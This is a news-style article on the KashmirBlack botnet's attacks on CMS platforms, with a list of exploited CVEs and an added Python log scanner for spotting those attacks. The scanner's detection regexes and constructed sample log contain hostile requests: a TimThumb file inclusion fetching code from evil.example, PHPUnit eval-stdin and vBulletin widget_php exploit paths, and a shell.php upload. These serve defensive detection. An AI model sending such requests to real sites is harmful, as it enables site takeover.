Researchers at Imperva have documented the operations of a botnet called KashmirBlack, believed to be behind attacks against WordPress, Drupal, and other CMS platforms. The botnet has grown to the point of infecting thousands of sites per day, using the compromised servers for cryptocurrency mining and spam redirections.
Hacking Sites For Mining Cryptocurrencies
Cryptocurrency mining needs extensive computing resources. While it can be done on ordinary computers and phones, they earn next to nothing. High-end servers and GPUs are far more effective, but they are expensive; hijacking other people's servers to run mining software and mint coins is comparatively cheap. This is exactly what the botnet named KashmirBlack does.
As per the reports (1, 2) from Imperva, a cybersecurity firm, a botnet named KashmirBlack is said to be behind attacks against CMS platforms including WordPress, Joomla!, Drupal, PrestaShop, Magento, osCommerce, vBulletin, Yeager, and OpenCart. Researchers attribute the botnet to an operator known as Exect1337, a member of the Indonesian hacker crew PhantomGhost, who scans the internet for target sites.
The group (or individual) first searches for sites running outdated software and exploits them through known vulnerabilities. After hijacking a site, they take over the underlying server and use it for cryptocurrency mining, redirecting traffic to spam sites, and web defacements.
Researchers say the botnet began operating in November last year and has grown steadily since.
It became more sophisticated in May this year, when it upgraded its C&C server and gained the ability to infect thousands of sites per day. To date, it is believed to have infected hundreds of thousands of websites by attacking their underlying CMS or components of that CMS.
It is now managed “by one C&C (Command and Control) server and uses more than 60 – mostly innocent surrogate – servers as part of its infrastructure,” the Imperva researchers said.
Further, “[The botnet] handles hundreds of bots, each communicating with the C&C to receive new targets, perform brute force attacks, install backdoors, and expand the size of the botnet.”
Since its inception, the botnet is said to have abused sites around the world by exploiting the following vulnerabilities:
- WordPress install.php RCE
- WordPress xmlrpc.php Login Brute-Force attack
- WordPress multiple Plugins RCE
- WordPress multiple Themes RCE
- WordPress TimThumb RFI Vulnerability – CVE-2011-4106
- WebDAV file upload vulnerability
- Joomla! remote file upload vulnerability
- Magento Local File Inclusion – CVE-2015-2067
- Yeager CMS vulnerability – CVE-2015-7571
- PHPUnit Remote Code Execution – CVE-2017-9841
- jQuery file upload vulnerability – CVE-2018-9206
- elFinder Command Injection – CVE-2019-9194
- vBulletin Widget RCE – CVE-2019-16759
- Uploadify RCE vulnerability
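As an added example, not code from the Imperva report or from this article, the Python script below scans constructed web-server access-log lines for requests to the endpoints behind several entries in the list above, and flags the xmlrpc.php login brute-force pattern by counting POSTs per source address. The endpoint paths, the sample log lines and the threshold are assumptions chosen for illustration; a hit means the vulnerable surface was probed by something, not that an exploit succeeded.

```python
import re
from collections import Counter

# Combined-log-format line: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Request-target indicators for entries in the vulnerability list above.
# The paths are the publicly known vulnerable endpoints (an assumption for
# this example, not taken from the Imperva report). A hit means the surface
# was probed, not that exploitation succeeded.
SIGNATURES = [
    ("WordPress install.php reachable", None, re.compile(r'/wp-admin/install\.php', re.I)),
    ("CVE-2011-4106 TimThumb RFI", None, re.compile(r'timthumb\.php\?.*\bsrc=https?(:|%3a)', re.I)),
    ("WebDAV PUT of a script file", "PUT", re.compile(r'\.ph(p\d?|tml)$', re.I)),
    ("CVE-2017-9841 PHPUnit eval-stdin RCE", "POST", re.compile(r'/eval-stdin\.php', re.I)),
    ("CVE-2018-9206 jQuery File Upload", "POST", re.compile(r'jquery-file-upload/server/php/', re.I)),
    ("CVE-2019-9194 elFinder connector reached", None, re.compile(r'/elfinder/php/connector(\.minimal)?\.php', re.I)),
    ("CVE-2019-16759 vBulletin widget_php", "POST", re.compile(r'ajax/render/widget_php', re.I)),
]


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_signatures(entry):
    """Labels of every signature whose method (if any) and target pattern match."""
    hits = []
    for label, method, pattern in SIGNATURES:
        if method and entry["method"] != method:
            continue
        if pattern.search(entry["target"]):
            hits.append(label)
    return hits


def analyze(log_text, xmlrpc_threshold=5):
    """Scan log text; return (ip, label, target) alerts.

    xmlrpc_threshold is an assumed cut-off: that many POSTs to xmlrpc.php
    from one address in the window covered by the log is treated as a
    login brute-force attempt.
    """
    alerts = []
    xmlrpc_posts = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for label in match_signatures(entry):
            alerts.append((entry["ip"], label, entry["target"]))
        path = entry["target"].split("?", 1)[0]
        if entry["method"] == "POST" and path.endswith("/xmlrpc.php"):
            xmlrpc_posts[entry["ip"]] += 1
    for ip, n in xmlrpc_posts.items():
        if n >= xmlrpc_threshold:
            alerts.append((ip, f"xmlrpc.php brute force ({n} POSTs)", "/xmlrpc.php"))
    return alerts


# Constructed sample traffic (documentation IP ranges, made-up hosts), not real logs.
XMLRPC_BURST = [
    f'203.0.113.5 - - [24/Oct/2020:10:01:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"'
    for i in range(6)
]
SAMPLE_LOG = "\n".join(XMLRPC_BURST + [
    '198.51.100.9 - - [24/Oct/2020:10:02:10 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://evil.example/a.php HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.9 - - [24/Oct/2020:10:02:11 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 12 "-" "python-requests/2.24.0"',
    '192.0.2.7 - - [24/Oct/2020:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.7 - - [24/Oct/2020:10:03:01 +0000] "POST /index.php?routestring=ajax/render/widget_php HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '192.0.2.7 - - [24/Oct/2020:10:03:02 +0000] "PUT /uploads/shell.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for ip, label, target in analyze(SAMPLE_LOG):
        print(f"{ip:15} {label:45} {target}")
```

Run it as-is to see the alerts for the constructed log, or feed it a real access log by replacing SAMPLE_LOG with the file contents. The benign `GET /index.php` line produces no alert, and raising `xmlrpc_threshold` above the number of POSTs in the log silences the brute-force alert, which is how you would tune it against legitimate xmlrpc.php clients such as the WordPress mobile app or Jetpack.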